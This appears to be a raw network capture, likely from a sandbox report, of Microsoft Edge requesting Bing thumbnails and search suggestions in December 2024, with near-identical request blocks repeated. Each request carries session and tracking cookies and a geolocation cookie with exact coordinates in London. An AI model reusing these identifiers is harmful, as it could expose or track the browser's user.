cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5286
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd7e
GET

https://www.bing.com/th?id=OSK.f230f91126f1fed48b53bc0925196f3e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.f230f91126f1fed48b53bc0925196f3e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2481
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd7f
GET

https://www.bing.com/th?id=OSK.72fd381818def5b8a5e2d3ce9dd54a61&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.72fd381818def5b8a5e2d3ce9dd54a61&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3268
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd82
GET

https://www.bing.com/th?id=OSK.cLp7JTM2eOqxUwtir0jyyglxBvVfsRhRCjZ-aVdPU_8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.cLp7JTM2eOqxUwtir0jyyglxBvVfsRhRCjZ-aVdPU_8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8129
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd83
GET

https://www.bing.com/th?id=OSK.7VUIbBNHlEnXBsU04ajdFxWghEBdT5C2vltlZ6FukY8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.7VUIbBNHlEnXBsU04ajdFxWghEBdT5C2vltlZ6FukY8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3599
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cd81
GET

https://www.bing.com/th?id=OSK.417eed68ca852e632a0fe75c49d48f4d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.417eed68ca852e632a0fe75c49d48f4d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1278
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a382c9047fb9af80043e27d9635
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-MsmloawwDcXJajsCsYj44Wah8rroRylZ1YOGtL2/47U='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:56 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1cfba
GET

https://www.bing.com/th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3766
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1d034
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=da&cp=2&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

